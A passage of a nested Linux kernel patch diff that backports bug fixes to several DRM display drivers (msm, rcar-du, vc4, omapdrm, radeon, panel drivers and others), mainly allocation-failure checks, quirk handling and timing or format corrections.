+ 	drm_connector_helper_add(&dpu_wb_conn->base.base, &dpu_wb_conn_helper_funcs);
+ 
+diff --git a/drivers/gpu/drm/msm/disp/mdp5/mdp5_crtc.c b/drivers/gpu/drm/msm/disp/mdp5/mdp5_crtc.c
+index e86421c69bd1f..86036dd4e1e82 100644
+--- a/drivers/gpu/drm/msm/disp/mdp5/mdp5_crtc.c
++++ b/drivers/gpu/drm/msm/disp/mdp5/mdp5_crtc.c
+@@ -1139,7 +1139,10 @@ static void mdp5_crtc_reset(struct drm_crtc *crtc)
+ 	if (crtc->state)
+ 		mdp5_crtc_destroy_state(crtc, crtc->state);
+ 
+-	__drm_atomic_helper_crtc_reset(crtc, &mdp5_cstate->base);
++	if (mdp5_cstate)
++		__drm_atomic_helper_crtc_reset(crtc, &mdp5_cstate->base);
++	else
++		__drm_atomic_helper_crtc_reset(crtc, NULL);
+ }
+ 
+ static const struct drm_crtc_funcs mdp5_crtc_no_lm_cursor_funcs = {
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_cfg.c b/drivers/gpu/drm/msm/dsi/dsi_cfg.c
+index 7e97c239ed489..e0bd452a9f1e6 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_cfg.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_cfg.c
+@@ -209,8 +209,8 @@ static const struct msm_dsi_config sc7280_dsi_cfg = {
+ 	.num_regulators = ARRAY_SIZE(sc7280_dsi_regulators),
+ 	.bus_clk_names = dsi_sc7280_bus_clk_names,
+ 	.num_bus_clks = ARRAY_SIZE(dsi_sc7280_bus_clk_names),
+-	.io_start = { 0xae94000 },
+-	.num_dsi = 1,
++	.io_start = { 0xae94000, 0xae96000 },
++	.num_dsi = 2,
+ };
+ 
+ static const char * const dsi_qcm2290_bus_clk_names[] = {
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_host.c b/drivers/gpu/drm/msm/dsi/dsi_host.c
+index 89aadd3b3202b..f167a45f1fbdd 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_host.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_host.c
+@@ -1977,6 +1977,9 @@ int msm_dsi_host_init(struct msm_dsi *msm_dsi)
+ 
+ 	/* setup workqueue */
+ 	msm_host->workqueue = alloc_ordered_workqueue("dsi_drm_work", 0);
++	if (!msm_host->workqueue)
++		return -ENOMEM;
++
+ 	INIT_WORK(&msm_host->err_work, dsi_err_worker);
+ 
+ 	msm_dsi->id = msm_host->id;
+diff --git a/drivers/gpu/drm/msm/hdmi/hdmi.c b/drivers/gpu/drm/msm/hdmi/hdmi.c
+index 8cd5d50639a53..333cedc11f215 100644
+--- a/drivers/gpu/drm/msm/hdmi/hdmi.c
++++ b/drivers/gpu/drm/msm/hdmi/hdmi.c
+@@ -255,6 +255,10 @@ static struct hdmi *msm_hdmi_init(struct platform_device *pdev)
+ 	devm_pm_runtime_enable(&pdev->dev);
+ 
+ 	hdmi->workq = alloc_ordered_workqueue("msm_hdmi", 0);
++	if (!hdmi->workq) {
++		ret = -ENOMEM;
++		goto fail;
++	}
+ 
+ 	hdmi->i2c = msm_hdmi_i2c_init(hdmi);
+ 	if (IS_ERR(hdmi->i2c)) {
+diff --git a/drivers/gpu/drm/msm/msm_drv.c b/drivers/gpu/drm/msm/msm_drv.c
+index 681c1b889b31a..5a0ff112634b7 100644
+--- a/drivers/gpu/drm/msm/msm_drv.c
++++ b/drivers/gpu/drm/msm/msm_drv.c
+@@ -494,7 +494,7 @@ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ 		if (IS_ERR(priv->event_thread[i].worker)) {
+ 			ret = PTR_ERR(priv->event_thread[i].worker);
+ 			DRM_DEV_ERROR(dev, "failed to create crtc_event kthread\n");
+-			ret = PTR_ERR(priv->event_thread[i].worker);
++			priv->event_thread[i].worker = NULL;
+ 			goto err_msm_uninit;
+ 		}
+ 
+diff --git a/drivers/gpu/drm/msm/msm_fence.c b/drivers/gpu/drm/msm/msm_fence.c
+index a47e5837c528f..56641408ea742 100644
+--- a/drivers/gpu/drm/msm/msm_fence.c
++++ b/drivers/gpu/drm/msm/msm_fence.c
+@@ -22,7 +22,7 @@ msm_fence_context_alloc(struct drm_device *dev, volatile uint32_t *fenceptr,
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	fctx->dev = dev;
+-	strncpy(fctx->name, name, sizeof(fctx->name));
++	strscpy(fctx->name, name, sizeof(fctx->name));
+ 	fctx->context = dma_fence_context_alloc(1);
+ 	fctx->index = index++;
+ 	fctx->fenceptr = fenceptr;
+diff --git a/drivers/gpu/drm/msm/msm_gem_submit.c b/drivers/gpu/drm/msm/msm_gem_submit.c
+index 45a3e5cadc7da..7c2cc1262c05d 100644
+--- a/drivers/gpu/drm/msm/msm_gem_submit.c
++++ b/drivers/gpu/drm/msm/msm_gem_submit.c
+@@ -209,6 +209,10 @@ static int submit_lookup_cmds(struct msm_gem_submit *submit,
+ 			goto out;
+ 		}
+ 		submit->cmd[i].relocs = kmalloc(sz, GFP_KERNEL);
++		if (!submit->cmd[i].relocs) {
++			ret = -ENOMEM;
++			goto out;
++		}
+ 		ret = copy_from_user(submit->cmd[i].relocs, userptr, sz);
+ 		if (ret) {
+ 			ret = -EFAULT;
+diff --git a/drivers/gpu/drm/mxsfb/Kconfig b/drivers/gpu/drm/mxsfb/Kconfig
+index 116f8168bda4a..518b533453548 100644
+--- a/drivers/gpu/drm/mxsfb/Kconfig
++++ b/drivers/gpu/drm/mxsfb/Kconfig
+@@ -8,6 +8,7 @@ config DRM_MXSFB
+ 	tristate "i.MX (e)LCDIF LCD controller"
+ 	depends on DRM && OF
+ 	depends on COMMON_CLK
++	depends on ARCH_MXS || ARCH_MXC || COMPILE_TEST
+ 	select DRM_MXS
+ 	select DRM_KMS_HELPER
+ 	select DRM_GEM_DMA_HELPER
+@@ -24,6 +25,7 @@ config DRM_IMX_LCDIF
+ 	tristate "i.MX LCDIFv3 LCD controller"
+ 	depends on DRM && OF
+ 	depends on COMMON_CLK
++	depends on ARCH_MXC || COMPILE_TEST
+ 	select DRM_MXS
+ 	select DRM_KMS_HELPER
+ 	select DRM_GEM_DMA_HELPER
+diff --git a/drivers/gpu/drm/omapdrm/dss/dsi.c b/drivers/gpu/drm/omapdrm/dss/dsi.c
+index a6845856cbce4..4c1084eb01759 100644
+--- a/drivers/gpu/drm/omapdrm/dss/dsi.c
++++ b/drivers/gpu/drm/omapdrm/dss/dsi.c
+@@ -1039,22 +1039,26 @@ static int dsi_dump_dsi_irqs(struct seq_file *s, void *p)
+ {
+ 	struct dsi_data *dsi = s->private;
+ 	unsigned long flags;
+-	struct dsi_irq_stats stats;
++	struct dsi_irq_stats *stats;
++
++	stats = kmalloc(sizeof(*stats), GFP_KERNEL);
++	if (!stats)
++		return -ENOMEM;
+ 
+ 	spin_lock_irqsave(&dsi->irq_stats_lock, flags);
+ 
+-	stats = dsi->irq_stats;
++	*stats = dsi->irq_stats;
+ 	memset(&dsi->irq_stats, 0, sizeof(dsi->irq_stats));
+ 	dsi->irq_stats.last_reset = jiffies;
+ 
+ 	spin_unlock_irqrestore(&dsi->irq_stats_lock, flags);
+ 
+ 	seq_printf(s, "period %u ms\n",
+-			jiffies_to_msecs(jiffies - stats.last_reset));
++			jiffies_to_msecs(jiffies - stats->last_reset));
+ 
+-	seq_printf(s, "irqs %d\n", stats.irq_count);
++	seq_printf(s, "irqs %d\n", stats->irq_count);
+ #define PIS(x) \
+-	seq_printf(s, "%-20s %10d\n", #x, stats.dsi_irqs[ffs(DSI_IRQ_##x)-1]);
++	seq_printf(s, "%-20s %10d\n", #x, stats->dsi_irqs[ffs(DSI_IRQ_##x)-1]);
+ 
+ 	seq_printf(s, "-- DSI%d interrupts --\n", dsi->module_id + 1);
+ 	PIS(VC0);
+@@ -1078,10 +1082,10 @@ static int dsi_dump_dsi_irqs(struct seq_file *s, void *p)
+ 
+ #define PIS(x) \
+ 	seq_printf(s, "%-20s %10d %10d %10d %10d\n", #x, \
+-			stats.vc_irqs[0][ffs(DSI_VC_IRQ_##x)-1], \
+-			stats.vc_irqs[1][ffs(DSI_VC_IRQ_##x)-1], \
+-			stats.vc_irqs[2][ffs(DSI_VC_IRQ_##x)-1], \
+-			stats.vc_irqs[3][ffs(DSI_VC_IRQ_##x)-1]);
++			stats->vc_irqs[0][ffs(DSI_VC_IRQ_##x)-1], \
++			stats->vc_irqs[1][ffs(DSI_VC_IRQ_##x)-1], \
++			stats->vc_irqs[2][ffs(DSI_VC_IRQ_##x)-1], \
++			stats->vc_irqs[3][ffs(DSI_VC_IRQ_##x)-1]);
+ 
+ 	seq_printf(s, "-- VC interrupts --\n");
+ 	PIS(CS);
+@@ -1097,7 +1101,7 @@ static int dsi_dump_dsi_irqs(struct seq_file *s, void *p)
+ 
+ #define PIS(x) \
+ 	seq_printf(s, "%-20s %10d\n", #x, \
+-			stats.cio_irqs[ffs(DSI_CIO_IRQ_##x)-1]);
++			stats->cio_irqs[ffs(DSI_CIO_IRQ_##x)-1]);
+ 
+ 	seq_printf(s, "-- CIO interrupts --\n");
+ 	PIS(ERRSYNCESC1);
+@@ -1122,6 +1126,8 @@ static int dsi_dump_dsi_irqs(struct seq_file *s, void *p)
+ 	PIS(ULPSACTIVENOT_ALL1);
+ #undef PIS
+ 
++	kfree(stats);
++
+ 	return 0;
+ }
+ #endif
+diff --git a/drivers/gpu/drm/panel/panel-edp.c b/drivers/gpu/drm/panel/panel-edp.c
+index 4b39d1dd9140e..a163585a2a52b 100644
+--- a/drivers/gpu/drm/panel/panel-edp.c
++++ b/drivers/gpu/drm/panel/panel-edp.c
+@@ -1889,7 +1889,7 @@ static const struct edp_panel_entry edp_panels[] = {
+ 	EDP_PANEL_ENTRY('C', 'M', 'N', 0x1247, &delay_200_500_e80_d50, "N120ACA-EA1"),
+ 
+ 	EDP_PANEL_ENTRY('I', 'V', 'O', 0x057d, &delay_200_500_e200, "R140NWF5 RH"),
+-	EDP_PANEL_ENTRY('I', 'V', 'O', 0x854b, &delay_200_500_p2e100, "M133NW4J-R3"),
++	EDP_PANEL_ENTRY('I', 'V', 'O', 0x854b, &delay_200_500_p2e100, "R133NW4K-R0"),
+ 
+ 	EDP_PANEL_ENTRY('K', 'D', 'B', 0x0624, &kingdisplay_kd116n21_30nv_a010.delay, "116N21-30NV-A010"),
+ 	EDP_PANEL_ENTRY('K', 'D', 'B', 0x1120, &delay_200_500_e80_d50, "116N29-30NK-C007"),
+diff --git a/drivers/gpu/drm/panel/panel-samsung-s6e3ha2.c b/drivers/gpu/drm/panel/panel-samsung-s6e3ha2.c
+index 5c621b15e84c2..439ef30735128 100644
+--- a/drivers/gpu/drm/panel/panel-samsung-s6e3ha2.c
++++ b/drivers/gpu/drm/panel/panel-samsung-s6e3ha2.c
+@@ -692,7 +692,9 @@ static int s6e3ha2_probe(struct mipi_dsi_device *dsi)
+ 
+ 	dsi->lanes = 4;
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+-	dsi->mode_flags = MIPI_DSI_CLOCK_NON_CONTINUOUS;
++	dsi->mode_flags = MIPI_DSI_CLOCK_NON_CONTINUOUS |
++		MIPI_DSI_MODE_VIDEO_NO_HFP | MIPI_DSI_MODE_VIDEO_NO_HBP |
++		MIPI_DSI_MODE_VIDEO_NO_HSA | MIPI_DSI_MODE_NO_EOT_PACKET;
+ 
+ 	ctx->supplies[0].supply = "vdd3";
+ 	ctx->supplies[1].supply = "vci";
+diff --git a/drivers/gpu/drm/panel/panel-samsung-s6e63j0x03.c b/drivers/gpu/drm/panel/panel-samsung-s6e63j0x03.c
+index e06fd35de814b..9c3e76171759a 100644
+--- a/drivers/gpu/drm/panel/panel-samsung-s6e63j0x03.c
++++ b/drivers/gpu/drm/panel/panel-samsung-s6e63j0x03.c
+@@ -446,7 +446,8 @@ static int s6e63j0x03_probe(struct mipi_dsi_device *dsi)
+ 
+ 	dsi->lanes = 1;
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+-	dsi->mode_flags = MIPI_DSI_MODE_NO_EOT_PACKET;
++	dsi->mode_flags = MIPI_DSI_MODE_VIDEO_NO_HFP |
++		MIPI_DSI_MODE_VIDEO_NO_HBP | MIPI_DSI_MODE_VIDEO_NO_HSA;
+ 
+ 	ctx->supplies[0].supply = "vdd3";
+ 	ctx->supplies[1].supply = "vci";
+diff --git a/drivers/gpu/drm/panel/panel-samsung-s6e8aa0.c b/drivers/gpu/drm/panel/panel-samsung-s6e8aa0.c
+index 54213beafaf5e..ebf4c2d39ea88 100644
+--- a/drivers/gpu/drm/panel/panel-samsung-s6e8aa0.c
++++ b/drivers/gpu/drm/panel/panel-samsung-s6e8aa0.c
+@@ -990,8 +990,6 @@ static int s6e8aa0_probe(struct mipi_dsi_device *dsi)
+ 	dsi->lanes = 4;
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+ 	dsi->mode_flags = MIPI_DSI_MODE_VIDEO | MIPI_DSI_MODE_VIDEO_BURST
+-		| MIPI_DSI_MODE_VIDEO_NO_HFP | MIPI_DSI_MODE_VIDEO_NO_HBP
+-		| MIPI_DSI_MODE_VIDEO_NO_HSA | MIPI_DSI_MODE_NO_EOT_PACKET
+ 		| MIPI_DSI_MODE_VSYNC_FLUSH | MIPI_DSI_MODE_VIDEO_AUTO_VERT;
+ 
+ 	ret = s6e8aa0_parse_dt(ctx);
+diff --git a/drivers/gpu/drm/radeon/atombios_encoders.c b/drivers/gpu/drm/radeon/atombios_encoders.c
+index c841c273222e7..3e24fa11d4d38 100644
+--- a/drivers/gpu/drm/radeon/atombios_encoders.c
++++ b/drivers/gpu/drm/radeon/atombios_encoders.c
+@@ -2122,11 +2122,12 @@ int radeon_atom_pick_dig_encoder(struct drm_encoder *encoder, int fe_idx)
+ 
+ 	/*
+ 	 * On DCE32 any encoder can drive any block so usually just use crtc id,
+-	 * but Apple thinks different at least on iMac10,1, so there use linkb,
++	 * but Apple thinks different at least on iMac10,1 and iMac11,2, so there use linkb,
+ 	 * otherwise the internal eDP panel will stay dark.
+ 	 */
+ 	if (ASIC_IS_DCE32(rdev)) {
+-		if (dmi_match(DMI_PRODUCT_NAME, "iMac10,1"))
++		if (dmi_match(DMI_PRODUCT_NAME, "iMac10,1") ||
++		    dmi_match(DMI_PRODUCT_NAME, "iMac11,2"))
+ 			enc_idx = (dig->linkb) ? 1 : 0;
+ 		else
+ 			enc_idx = radeon_crtc->crtc_id;
+diff --git a/drivers/gpu/drm/radeon/radeon_device.c b/drivers/gpu/drm/radeon/radeon_device.c
+index a556b6be11374..e1f3ab607e4f4 100644
+--- a/drivers/gpu/drm/radeon/radeon_device.c
++++ b/drivers/gpu/drm/radeon/radeon_device.c
+@@ -1023,6 +1023,7 @@ void radeon_atombios_fini(struct radeon_device *rdev)
+ {
+ 	if (rdev->mode_info.atom_context) {
+ 		kfree(rdev->mode_info.atom_context->scratch);
++		kfree(rdev->mode_info.atom_context->iio);
+ 	}
+ 	kfree(rdev->mode_info.atom_context);
+ 	rdev->mode_info.atom_context = NULL;
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_crtc.c b/drivers/gpu/drm/rcar-du/rcar_du_crtc.c
+index 3619e1ddeb620..b7dd59fe119e6 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_crtc.c
++++ b/drivers/gpu/drm/rcar-du/rcar_du_crtc.c
+@@ -10,7 +10,6 @@
+ #include <linux/clk.h>
+ #include <linux/mutex.h>
+ #include <linux/platform_device.h>
+-#include <linux/sys_soc.h>
+ 
+ #include <drm/drm_atomic.h>
+ #include <drm/drm_atomic_helper.h>
+@@ -204,11 +203,6 @@ static void rcar_du_escr_divider(struct clk *clk, unsigned long target,
+ 	}
+ }
+ 
+-static const struct soc_device_attribute rcar_du_r8a7795_es1[] = {
+-	{ .soc_id = "r8a7795", .revision = "ES1.*" },
+-	{ /* sentinel */ }
+-};
+-
+ static void rcar_du_crtc_set_display_timing(struct rcar_du_crtc *rcrtc)
+ {
+ 	const struct drm_display_mode *mode = &rcrtc->crtc.state->adjusted_mode;
+@@ -238,7 +232,7 @@ static void rcar_du_crtc_set_display_timing(struct rcar_du_crtc *rcrtc)
+ 		 * no post-divider when a display PLL is present (as shown by
+ 		 * the workaround breaking HDMI output on M3-W during testing).
+ 		 */
+-		if (soc_device_match(rcar_du_r8a7795_es1)) {
++		if (rcdu->info->quirks & RCAR_DU_QUIRK_H3_ES1_PCLK_STABILITY) {
+ 			target *= 2;
+ 			div = 1;
+ 		}
+@@ -251,13 +245,30 @@ static void rcar_du_crtc_set_display_timing(struct rcar_du_crtc *rcrtc)
+ 		       | DPLLCR_N(dpll.n) | DPLLCR_M(dpll.m)
+ 		       | DPLLCR_STBY;
+ 
+-		if (rcrtc->index == 1)
++		if (rcrtc->index == 1) {
+ 			dpllcr |= DPLLCR_PLCS1
+ 			       |  DPLLCR_INCS_DOTCLKIN1;
+-		else
+-			dpllcr |= DPLLCR_PLCS0
++		} else {
++			dpllcr |= DPLLCR_PLCS0_PLL
+ 			       |  DPLLCR_INCS_DOTCLKIN0;
+ 
++			/*
++			 * On ES2.x we have a single mux controlled via bit 21,
++			 * which selects between DCLKIN source (bit 21 = 0) and
++			 * a PLL source (bit 21 = 1), where the PLL is always
++			 * PLL1.
++			 *
++			 * On ES1.x we have an additional mux, controlled
++			 * via bit 20, for choosing between PLL0 (bit 20 = 0)
++			 * and PLL1 (bit 20 = 1). We always want to use PLL1,
++			 * so on ES1.x, in addition to setting bit 21, we need
++			 * to set the bit 20.
++			 */
++
++			if (rcdu->info->quirks & RCAR_DU_QUIRK_H3_ES1_PLL)
++				dpllcr |= DPLLCR_PLCS0_H3ES1X_PLL1;
++		}
++
+ 		rcar_du_group_write(rcrtc->group, DPLLCR, dpllcr);
+ 
+ 		escr = ESCR_DCLKSEL_DCLKIN | div;
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_drv.c b/drivers/gpu/drm/rcar-du/rcar_du_drv.c
+index a2776f1d6f2c2..6381578c4db58 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_drv.c
++++ b/drivers/gpu/drm/rcar-du/rcar_du_drv.c
+@@ -16,6 +16,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/pm.h>
+ #include <linux/slab.h>
++#include <linux/sys_soc.h>
+ #include <linux/wait.h>
+ 
+ #include <drm/drm_atomic_helper.h>
+@@ -386,6 +387,43 @@ static const struct rcar_du_device_info rcar_du_r8a7795_info = {
+ 	.dpll_mask =  BIT(2) | BIT(1),
+ };
+ 
++static const struct rcar_du_device_info rcar_du_r8a7795_es1_info = {
++	.gen = 3,
++	.features = RCAR_DU_FEATURE_CRTC_IRQ
++		  | RCAR_DU_FEATURE_CRTC_CLOCK
++		  | RCAR_DU_FEATURE_VSP1_SOURCE
++		  | RCAR_DU_FEATURE_INTERLACED
++		  | RCAR_DU_FEATURE_TVM_SYNC,
++	.quirks = RCAR_DU_QUIRK_H3_ES1_PCLK_STABILITY
++		| RCAR_DU_QUIRK_H3_ES1_PLL,
++	.channels_mask = BIT(3) | BIT(2) | BIT(1) | BIT(0),
++	.routes = {
++		/*
++		 * R8A7795 has one RGB output, two HDMI outputs and one
++		 * LVDS output.
++		 */
++		[RCAR_DU_OUTPUT_DPAD0] = {
++			.possible_crtcs = BIT(3),
++			.port = 0,
++		},
++		[RCAR_DU_OUTPUT_HDMI0] = {
++			.possible_crtcs = BIT(1),
++			.port = 1,
++		},
++		[RCAR_DU_OUTPUT_HDMI1] = {
++			.possible_crtcs = BIT(2),
++			.port = 2,
++		},
++		[RCAR_DU_OUTPUT_LVDS0] = {
++			.possible_crtcs = BIT(0),
++			.port = 3,
++		},
++	},
++	.num_lvds = 1,
++	.num_rpf = 5,
++	.dpll_mask =  BIT(2) | BIT(1),
++};
++
+ static const struct rcar_du_device_info rcar_du_r8a7796_info = {
+ 	.gen = 3,
+ 	.features = RCAR_DU_FEATURE_CRTC_IRQ
+@@ -554,6 +592,11 @@ static const struct of_device_id rcar_du_of_table[] = {
+ 
+ MODULE_DEVICE_TABLE(of, rcar_du_of_table);
+ 
++static const struct soc_device_attribute rcar_du_soc_table[] = {
++	{ .soc_id = "r8a7795", .revision = "ES1.*", .data = &rcar_du_r8a7795_es1_info },
++	{ /* sentinel */ }
++};
++
+ const char *rcar_du_output_name(enum rcar_du_output output)
+ {
+ 	static const char * const names[] = {
+@@ -645,6 +688,7 @@ static void rcar_du_shutdown(struct platform_device *pdev)
+ 
+ static int rcar_du_probe(struct platform_device *pdev)
+ {
++	const struct soc_device_attribute *soc_attr;
+ 	struct rcar_du_device *rcdu;
+ 	unsigned int mask;
+ 	int ret;
+@@ -659,8 +703,13 @@ static int rcar_du_probe(struct platform_device *pdev)
+ 		return PTR_ERR(rcdu);
+ 
+ 	rcdu->dev = &pdev->dev;
++
+ 	rcdu->info = of_device_get_match_data(rcdu->dev);
+ 
++	soc_attr = soc_device_match(rcar_du_soc_table);
++	if (soc_attr)
++		rcdu->info = soc_attr->data;
++
+ 	platform_set_drvdata(pdev, rcdu);
+ 
+ 	/* I/O resources */
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_drv.h b/drivers/gpu/drm/rcar-du/rcar_du_drv.h
+index 5cfa2bb7ad93d..acc3673fefe18 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_drv.h
++++ b/drivers/gpu/drm/rcar-du/rcar_du_drv.h
+@@ -34,6 +34,8 @@ struct rcar_du_device;
+ #define RCAR_DU_FEATURE_NO_BLENDING	BIT(5)	/* PnMR.SPIM does not have ALP nor EOR bits */
+ 
+ #define RCAR_DU_QUIRK_ALIGN_128B	BIT(0)	/* Align pitches to 128 bytes */
++#define RCAR_DU_QUIRK_H3_ES1_PCLK_STABILITY BIT(1)	/* H3 ES1 has pclk stability issue */
++#define RCAR_DU_QUIRK_H3_ES1_PLL	BIT(2)	/* H3 ES1 PLL setup differs from non-ES1 */
+ 
+ enum rcar_du_output {
+ 	RCAR_DU_OUTPUT_DPAD0,
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_regs.h b/drivers/gpu/drm/rcar-du/rcar_du_regs.h
+index c1bcb0e8b5b4e..789ae9285108e 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_regs.h
++++ b/drivers/gpu/drm/rcar-du/rcar_du_regs.h
+@@ -283,12 +283,8 @@
+ #define DPLLCR			0x20044
+ #define DPLLCR_CODE		(0x95 << 24)
+ #define DPLLCR_PLCS1		(1 << 23)
+-/*
+- * PLCS0 is bit 21, but H3 ES1.x requires bit 20 to be set as well. As bit 20
+- * isn't implemented by other SoC in the Gen3 family it can safely be set
+- * unconditionally.
+- */
+-#define DPLLCR_PLCS0		(3 << 20)
++#define DPLLCR_PLCS0_PLL	(1 << 21)
++#define DPLLCR_PLCS0_H3ES1X_PLL1	(1 << 20)
+ #define DPLLCR_CLKE		(1 << 18)
+ #define DPLLCR_FDPLL(n)		((n) << 12)
+ #define DPLLCR_N(n)		((n) << 5)
+diff --git a/drivers/gpu/drm/tegra/firewall.c b/drivers/gpu/drm/tegra/firewall.c
+index 1824d2db0e2ce..d53f890fa6893 100644
+--- a/drivers/gpu/drm/tegra/firewall.c
++++ b/drivers/gpu/drm/tegra/firewall.c
+@@ -97,6 +97,9 @@ static int fw_check_regs_imm(struct tegra_drm_firewall *fw, u32 offset)
+ {
+ 	bool is_addr;
+ 
++	if (!fw->client->ops->is_addr_reg)
++		return 0;
++
+ 	is_addr = fw->client->ops->is_addr_reg(fw->client->base.dev, fw->class,
+ 					       offset);
+ 	if (is_addr)
+diff --git a/drivers/gpu/drm/tidss/tidss_dispc.c b/drivers/gpu/drm/tidss/tidss_dispc.c
+index ad93acc9abd2a..16301bdfead12 100644
+--- a/drivers/gpu/drm/tidss/tidss_dispc.c
++++ b/drivers/gpu/drm/tidss/tidss_dispc.c
+@@ -1858,8 +1858,8 @@ static const struct {
+ 	{ DRM_FORMAT_XBGR4444, 0x21, },
+ 	{ DRM_FORMAT_RGBX4444, 0x22, },
+ 
+-	{ DRM_FORMAT_ARGB1555, 0x25, },
+-	{ DRM_FORMAT_ABGR1555, 0x26, },
++	{ DRM_FORMAT_XRGB1555, 0x25, },
++	{ DRM_FORMAT_XBGR1555, 0x26, },
+ 
+ 	{ DRM_FORMAT_XRGB8888, 0x27, },
+ 	{ DRM_FORMAT_XBGR8888, 0x28, },
+diff --git a/drivers/gpu/drm/tiny/ili9486.c b/drivers/gpu/drm/tiny/ili9486.c
+index c80028bb1d110..7b3048a3d9086 100644
+--- a/drivers/gpu/drm/tiny/ili9486.c
++++ b/drivers/gpu/drm/tiny/ili9486.c
+@@ -43,6 +43,7 @@ static int waveshare_command(struct mipi_dbi *mipi, u8 *cmd, u8 *par,
+ 			     size_t num)
+ {
+ 	struct spi_device *spi = mipi->spi;
++	unsigned int bpw = 8;
+ 	void *data = par;
+ 	u32 speed_hz;
+ 	int i, ret;
+@@ -56,8 +57,6 @@ static int waveshare_command(struct mipi_dbi *mipi, u8 *cmd, u8 *par,
+ 	 * The displays are Raspberry Pi HATs and connected to the 8-bit only
+ 	 * SPI controller, so 16-bit command and parameters need byte swapping
+ 	 * before being transferred as 8-bit on the big endian SPI bus.
+-	 * Pixel data bytes have already been swapped before this function is
+-	 * called.
+ 	 */
+ 	buf[0] = cpu_to_be16(*cmd);
+ 	gpiod_set_value_cansleep(mipi->dc, 0);
+@@ -71,12 +70,18 @@ static int waveshare_command(struct mipi_dbi *mipi, u8 *cmd, u8 *par,
+ 		for (i = 0; i < num; i++)
+ 			buf[i] = cpu_to_be16(par[i]);
+ 		num *= 2;
+-		speed_hz = mipi_dbi_spi_cmd_max_speed(spi, num);
+ 		data = buf;
+ 	}
+ 
++	/*
++	 * Check whether pixel data bytes needs to be swapped or not
++	 */
++	if (*cmd == MIPI_DCS_WRITE_MEMORY_START && !mipi->swap_bytes)
++		bpw = 16;
++
+ 	gpiod_set_value_cansleep(mipi->dc, 1);
+-	ret = mipi_dbi_spi_transfer(spi, speed_hz, 8, data, num);
++	speed_hz = mipi_dbi_spi_cmd_max_speed(spi, num);
++	ret = mipi_dbi_spi_transfer(spi, speed_hz, bpw, data, num);
+  free:
+ 	kfree(buf);
+ 
+diff --git a/drivers/gpu/drm/vc4/vc4_dpi.c b/drivers/gpu/drm/vc4/vc4_dpi.c
+index 1f8f44b7b5a5f..61ef7d232a12c 100644
+--- a/drivers/gpu/drm/vc4/vc4_dpi.c
++++ b/drivers/gpu/drm/vc4/vc4_dpi.c
+@@ -179,7 +179,7 @@ static void vc4_dpi_encoder_enable(struct drm_encoder *encoder)
+ 						       DPI_FORMAT);
+ 				break;
+ 			case MEDIA_BUS_FMT_RGB565_1X16:
+-				dpi_c |= VC4_SET_FIELD(DPI_FORMAT_16BIT_565_RGB_3,
++				dpi_c |= VC4_SET_FIELD(DPI_FORMAT_16BIT_565_RGB_1,
+ 						       DPI_FORMAT);
+ 				break;
+ 			default:
+diff --git a/drivers/gpu/drm/vc4/vc4_hdmi.c b/drivers/gpu/drm/vc4/vc4_hdmi.c
+index c4b73d9dd0409..ea2eaf6032caa 100644
+--- a/drivers/gpu/drm/vc4/vc4_hdmi.c
++++ b/drivers/gpu/drm/vc4/vc4_hdmi.c
+@@ -402,6 +402,7 @@ static void vc4_hdmi_handle_hotplug(struct vc4_hdmi *vc4_hdmi,
+ {
+ 	struct drm_connector *connector = &vc4_hdmi->connector;
+ 	struct edid *edid;
++	int ret;
+ 
+ 	/*
+ 	 * NOTE: This function should really be called with
+@@ -430,7 +431,15 @@ static void vc4_hdmi_handle_hotplug(struct vc4_hdmi *vc4_hdmi,
+ 	cec_s_phys_addr_from_edid(vc4_hdmi->cec_adap, edid);
+ 	kfree(edid);
+ 
+-	vc4_hdmi_reset_link(connector, ctx);
++	for (;;) {
++		ret = vc4_hdmi_reset_link(connector, ctx);
++		if (ret == -EDEADLK) {
++			drm_modeset_backoff(ctx);
++			continue;
++		}
++
++		break;
++	}
+ }
+ 
+ static int vc4_hdmi_connector_detect_ctx(struct drm_connector *connector,
+@@ -1297,11 +1306,12 @@ static void vc5_hdmi_set_timings(struct vc4_hdmi *vc4_hdmi,
+ 		     VC4_SET_FIELD(mode->crtc_vdisplay, VC5_HDMI_VERTA_VAL));
+ 	u32 vertb = (VC4_SET_FIELD(mode->htotal >> (2 - pixel_rep),
+ 				   VC5_HDMI_VERTB_VSPO) |
+-		     VC4_SET_FIELD(mode->crtc_vtotal - mode->crtc_vsync_end,
++		     VC4_SET_FIELD(mode->crtc_vtotal - mode->crtc_vsync_end +
++				   interlaced,
+ 				   VC4_HDMI_VERTB_VBP));
+ 	u32 vertb_even = (VC4_SET_FIELD(0, VC5_HDMI_VERTB_VSPO) |
+ 			  VC4_SET_FIELD(mode->crtc_vtotal -
+-					mode->crtc_vsync_end - interlaced,
++					mode->crtc_vsync_end,
+ 					VC4_HDMI_VERTB_VBP));
+ 	unsigned long flags;
+ 	unsigned char gcp;
+diff --git a/drivers/gpu/drm/vc4/vc4_hvs.c b/drivers/gpu/drm/vc4/vc4_hvs.c
+index 4ac9f5a2d5f99..47990ecbfc4df 100644
+--- a/drivers/gpu/drm/vc4/vc4_hvs.c
++++ b/drivers/gpu/drm/vc4/vc4_hvs.c
+@@ -368,28 +368,30 @@ static int vc4_hvs_init_channel(struct vc4_hvs *hvs, struct drm_crtc *crtc,
+ 	 * mode.
+ 	 */
+ 	dispctrl = SCALER_DISPCTRLX_ENABLE;
++	dispbkgndx = HVS_READ(SCALER_DISPBKGNDX(chan));
+ 
+-	if (!vc4->is_vc5)
++	if (!vc4->is_vc5) {
+ 		dispctrl |= VC4_SET_FIELD(mode->hdisplay,
